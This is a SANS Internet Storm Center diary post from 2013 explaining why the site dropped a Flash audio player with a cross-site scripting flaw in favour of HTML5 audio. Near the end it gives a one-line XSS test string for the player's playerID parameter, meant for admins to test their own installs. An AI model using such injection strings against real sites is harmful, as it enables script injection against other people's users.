Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: "De Flashing" the ISC Web Site and Flash XSS issues InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

"De Flashing" the ISC Web Site and Flash XSS issues

Published: 2013-05-08
Last Updated: 2013-05-08 19:14:59 UTC
by Johannes Ullrich (Version: 1)
4 comment(s)

You may have noticed that earlier today, I removed the flash player that we use to play audio files on our site. The trigger for this was a report that the particular flash player we use (an open source player usually used with Wordpress) is suscepible to cross site scripting [1][2]. Instead of upgrading to the newer (patched) version, we instead decided to remove the player. 

The other part of this is that pretty much all current browsers do have reasonable support for HTML 5 audio tags. We do offer our audio files, like the daily podcast, in MP3 as well as Ogg Vorbis format, which covers all major browsers. We also offer links to the direct files in case someone would like to play the files "offline" and we do offer via RSS feeds various MP3/Podcast players. 

So in short, the flash player wasn't worth maintaining. 

On the other hand, we will try to embrace some of the HTML5 features more as we move the site forward. The data will still be available in pretty much any browser (yup. ... lynx), but you will see our graphs and similar parts of the site take advantage of newer browser features to make it easier to navigate the data. For now, we still got a couple of flash movies on the site, but we are working on moving them either to youtube, or using our own (again HTML5 based) solution.

Big thanks to Rafay Baloch [3] for reporting the XSS vulnerability to us! 

Example exploit string to test your own player: player.swf ? playerID= \\%22))} catch(e){alert('Your%20cookies%20are%20mine%20now')} //    (remove spaces, but keep the // at the end)

[3] twitter @rafaybaloch

Johannes B. Ullrich, Ph.D.
SANS Technology Institute

Keywords: adobe flash xss
4 comment(s)
Diary Archives